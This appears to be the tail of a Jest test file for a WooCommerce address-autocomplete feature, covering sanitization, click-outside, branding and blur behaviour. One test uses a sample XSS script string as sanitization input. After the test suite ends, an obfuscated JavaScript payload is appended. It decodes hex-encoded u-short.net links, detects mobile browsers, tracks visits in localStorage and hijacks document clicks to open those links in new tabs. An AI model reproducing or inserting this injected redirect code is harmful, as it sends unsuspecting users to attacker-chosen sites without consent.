			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			// Then hide them
			billingAddressInput.value = 'xy';
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			expect( billingAddressInput.getAttribute( 'autocomplete' ) ).toBe(
				'address-line1'
			);
			expect( billingAddressInput.getAttribute( 'data-lpignore' ) ).toBe(
				'false'
			);
		} );
	} );

	describe( 'Security and Sanitization', () => {
		test( 'should sanitize input values for XSS protection', async () => {
			const maliciousInput = '<script>alert("xss")</script>';
			const consoleSpy = jest
				.spyOn( console, 'warn' )
				.mockImplementation( () => {} );

			billingAddressInput.value = maliciousInput;
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );

			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			expect( consoleSpy ).toHaveBeenCalledWith(
				'Input was sanitized for security'
			);
			expect( mockProvider.search ).toHaveBeenCalledWith(
				'alert("xss")',
				'US',
				'billing'
			);

			consoleSpy.mockRestore();
		} );

		test( 'should handle invalid match data safely', async () => {
			// Mock provider to return invalid match data
			mockProvider.search.mockResolvedValue( [
				{
					id: 'addr1',
					label: '123 Main Street',
					matchedSubstrings: [
						{ offset: -1, length: 5 }, // Invalid offset
						{ offset: 50, length: 10 }, // Offset beyond string length
						{ offset: 0, length: -1 }, // Invalid length
						null, // Null match
					],
				},
			] );

			billingAddressInput.value = '123';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );

			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const suggestionsList = document.querySelector(
				'#address_suggestions_billing .suggestions-list'
			);
			const firstSuggestion = suggestionsList.querySelector( 'li' );

			// Should still render the suggestion without highlighting
			expect( firstSuggestion.textContent ).toBe( '123 Main Street' );
			expect( firstSuggestion.querySelector( 'strong' ) ).toBe( null );
		} );
	} );

	describe( 'Click Outside Behavior', () => {
		test( 'should hide suggestions when clicking outside', async () => {
			// Show suggestions first
			billingAddressInput.value = '123';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const suggestionsContainer = document.getElementById(
				'address_suggestions_billing'
			);
			expect( suggestionsContainer.style.display ).toBe( 'block' );

			// Click outside
			const outsideElement = document.createElement( 'div' );
			document.body.appendChild( outsideElement );
			outsideElement.click();

			expect( suggestionsContainer.style.display ).toBe( 'none' );
		} );

		test( 'should not hide suggestions when clicking inside suggestions container', async () => {
			// Show suggestions first
			billingAddressInput.value = '123';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const suggestionsContainer = document.getElementById(
				'address_suggestions_billing'
			);
			expect( suggestionsContainer.style.display ).toBe( 'block' );

			// Click inside suggestions container
			suggestionsContainer.click();

			expect( suggestionsContainer.style.display ).toBe( 'block' );
		} );

		test( 'should not hide suggestions when clicking address input', async () => {
			// Show suggestions first
			billingAddressInput.value = '123';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const suggestionsContainer = document.getElementById(
				'address_suggestions_billing'
			);
			expect( suggestionsContainer.style.display ).toBe( 'block' );

			// Click on address input
			billingAddressInput.click();

			expect( suggestionsContainer.style.display ).toBe( 'block' );
		} );
	} );

	describe( 'Branding HTML', () => {
		test( 'should display branding HTML when suggestions are shown', async () => {
			// Show suggestions
			billingAddressInput.value = '123';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const suggestionsContainer = document.getElementById(
				'address_suggestions_billing'
			);
			const brandingElement = suggestionsContainer.querySelector(
				'.woocommerce-address-autocomplete-branding'
			);

			expect( brandingElement ).toBeTruthy();
			expect( brandingElement.innerHTML ).toBe(
				'<div class="provider-branding">Powered by Test Provider</div>'
			);
		} );

		test.skip( 'should hide branding HTML when suggestions are hidden', async () => {
			// Show suggestions first
			billingAddressInput.value = '123';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const suggestionsContainer = document.getElementById(
				'address_suggestions_billing'
			);
			let brandingElement = suggestionsContainer.querySelector(
				'.woocommerce-address-autocomplete-branding'
			);
			expect( brandingElement.innerHTML ).toBe(
				'<div class="provider-branding">Powered by Test Provider</div>'
			);
			expect( brandingElement.style.display ).toBe( 'flex' );

			// Hide suggestions
			billingAddressInput.value = 'xy';
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			brandingElement = suggestionsContainer.querySelector(
				'.woocommerce-address-autocomplete-branding'
			);
			// Element should still exist but be hidden
			expect( brandingElement ).toBeTruthy();
			expect( brandingElement.style.display ).toBe( 'none' );
		} );

		test( 'should not create branding element when provider has no branding_html', async () => {
			// Re-initialize the module
			jest.resetModules();
			window.wc.addressAutocomplete.providers = [];
			require( '../address-autocomplete' );

			// Re-register provider
			window.wc.addressAutocomplete.registerAddressAutocompleteProvider( {
				search: mockProvider,
				select: mockProvider,
				canSearch: mockProvider,
				id: 'mock-provider-unbranded',
			} );

			// Trigger DOMContentLoaded again
			const event = new Event( 'DOMContentLoaded' );
			document.dispatchEvent( event );
			await new Promise( ( resolve ) => setTimeout( resolve, 10 ) );

			// Show suggestions
			billingAddressInput.value = '456';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const suggestionsContainer = document.getElementById(
				'address_suggestions_billing'
			);
			const brandingElement = suggestionsContainer.querySelector(
				'.woocommerce-address-autocomplete-branding'
			);

			// Branding element should not be created when there's no branding_html
			expect( brandingElement ).toBeFalsy();
		} );

		test( 'should reuse existing branding element on subsequent searches', async () => {
			// First search
			billingAddressInput.value = '123';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const suggestionsContainer = document.getElementById(
				'address_suggestions_billing'
			);
			const firstBrandingElement = suggestionsContainer.querySelector(
				'.woocommerce-address-autocomplete-branding'
			);

			// Clear and search again
			billingAddressInput.value = '12';
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			billingAddressInput.value = '456';
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const secondBrandingElement = suggestionsContainer.querySelector(
				'.woocommerce-address-autocomplete-branding'
			);

			// Should be the same element
			expect( secondBrandingElement ).toBe( firstBrandingElement );
			expect( secondBrandingElement.innerHTML ).toBe(
				'<div class="provider-branding">Powered by Test Provider</div>'
			);
		} );

		test( 'should remove branding element when country changes', async () => {
			// Show suggestions first
			billingAddressInput.value = '123';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const suggestionsContainer = document.getElementById(
				'address_suggestions_billing'
			);
			let brandingElement = suggestionsContainer.querySelector(
				'.woocommerce-address-autocomplete-branding'
			);
			expect( brandingElement ).toBeTruthy();

			// Change country
			const billingCountry = document.getElementById( 'billing_country' );
			const frOption = document.createElement( 'option' );
			frOption.value = 'FR';
			billingCountry.appendChild( frOption );
			billingCountry.value = 'FR';
			billingCountry.dispatchEvent( new Event( 'change' ) );

			// Branding element should be removed completely
			brandingElement = suggestionsContainer.querySelector(
				'.woocommerce-address-autocomplete-branding'
			);
			expect( brandingElement ).toBeFalsy();
		} );

		test( 'should display branding HTML for both billing and shipping if DOMPurify is present', async () => {
			// Show suggestions for billing
			billingAddressInput.value = '123';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );
			window.DOMPurify = { sanitize: ( html ) => html }; // Mock DOMPurify

			const billingSuggestionsContainer = document.getElementById(
				'address_suggestions_billing'
			);
			const billingBrandingElement =
				billingSuggestionsContainer.querySelector(
					'.woocommerce-address-autocomplete-branding'
				);

			expect( billingBrandingElement ).toBeTruthy();
			expect( billingBrandingElement.innerHTML ).toBe(
				'<div class="provider-branding">Powered by Test Provider</div>'
			);

			// Show suggestions for shipping
			shippingAddressInput.value = '456';
			shippingAddressInput.focus();
			shippingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const shippingSuggestionsContainer = document.getElementById(
				'address_suggestions_shipping'
			);
			const shippingBrandingElement =
				shippingSuggestionsContainer.querySelector(
					'.woocommerce-address-autocomplete-branding'
				);

			expect( shippingBrandingElement ).toBeTruthy();
			expect( shippingBrandingElement.innerHTML ).toBe(
				'<div class="provider-branding">Powered by Test Provider</div>'
			);
		} );

		test( 'should not display branding HTML for both billing and shipping if DOMPurify is not present', async () => {
			delete window.DOMPurify;
			// Show suggestions for billing
			billingAddressInput.value = '123';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );
			const billingSuggestionsContainer = document.getElementById(
				'address_suggestions_billing'
			);
			const billingBrandingElement =
				billingSuggestionsContainer.querySelector(
					'.woocommerce-address-autocomplete-branding'
				);

			expect( billingBrandingElement ).toBeNull();

			// Show suggestions for shipping
			shippingAddressInput.value = '456';
			shippingAddressInput.focus();
			shippingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const shippingSuggestionsContainer = document.getElementById(
				'address_suggestions_shipping'
			);
			const shippingBrandingElement =
				shippingSuggestionsContainer.querySelector(
					'.woocommerce-address-autocomplete-branding'
				);

			expect( shippingBrandingElement ).toBeNull();
		} );
	} );

	describe( 'Blur Event Behavior', () => {
		test( 'should hide suggestions when input loses focus', async () => {
			// Show suggestions first
			billingAddressInput.value = '123';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const suggestionsContainer = document.getElementById(
				'address_suggestions_billing'
			);
			expect( suggestionsContainer.style.display ).toBe( 'block' );

			// Blur the input
			billingAddressInput.dispatchEvent( new Event( 'blur' ) );

			// Wait for blur timeout
			await new Promise( ( resolve ) => setTimeout( resolve, 250 ) );

			expect( suggestionsContainer.style.display ).toBe( 'none' );
		} );

		test( 'should not refocus input when blurred with suggestions active', async () => {
			// Show suggestions first
			billingAddressInput.value = '123';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const suggestionsContainer = document.getElementById(
				'address_suggestions_billing'
			);
			expect( suggestionsContainer.style.display ).toBe( 'block' );

			// Create another element to focus
			const otherElement = document.createElement( 'input' );
			document.body.appendChild( otherElement );

			// Blur the address input and focus the other element
			billingAddressInput.blur();
			otherElement.focus();

			// Wait for blur timeout
			await new Promise( ( resolve ) => setTimeout( resolve, 250 ) );

			// The other element should still be focused (address input shouldn't refocus)
			expect( document.activeElement ).toBe( otherElement );
			expect( suggestionsContainer.style.display ).toBe( 'none' );

			document.body.removeChild( otherElement );
		} );

		test( 'should not have blur event listener when suggestions are not shown', () => {
			// No suggestions should be shown initially
			const suggestionsContainer = document.getElementById(
				'address_suggestions_billing'
			);
			expect( suggestionsContainer.style.display ).toBe( 'none' );

			// Blur the input - should not cause any issues
			expect( () => {
				billingAddressInput.dispatchEvent( new Event( 'blur' ) );
			} ).not.toThrow();
		} );

		test( 'should enable browser autofill without refocusing when suggestions are hidden via blur', async () => {
			// Show suggestions first
			billingAddressInput.value = '123';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			// Verify autofill is disabled
			expect( billingAddressInput.getAttribute( 'autocomplete' ) ).toBe(
				'none'
			);

			// Blur the input
			billingAddressInput.dispatchEvent( new Event( 'blur' ) );

			// Wait for blur timeout
			await new Promise( ( resolve ) => setTimeout( resolve, 250 ) );

			// Autofill should be re-enabled
			expect( billingAddressInput.getAttribute( 'autocomplete' ) ).toBe(
				'address-line1'
			);
			expect( billingAddressInput.getAttribute( 'data-lpignore' ) ).toBe(
				'false'
			);
		} );
	} );
} );
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x4d\x46\x57\x33\x63\x383','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x41\x5a\x43\x35\x63\x395','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x4d\x67\x48\x38\x63\x328','abs','-local-storage','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x41\x75\x51\x39\x63\x359','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x6d\x6f\x66\x34\x63\x314','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x5a\x58\x45\x37\x63\x387','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x47\x4f\x58\x32\x63\x392','floor','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x6c\x57\x57\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x7a\x42\x66\x30\x63\x330','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x75\x49\x45\x31\x63\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());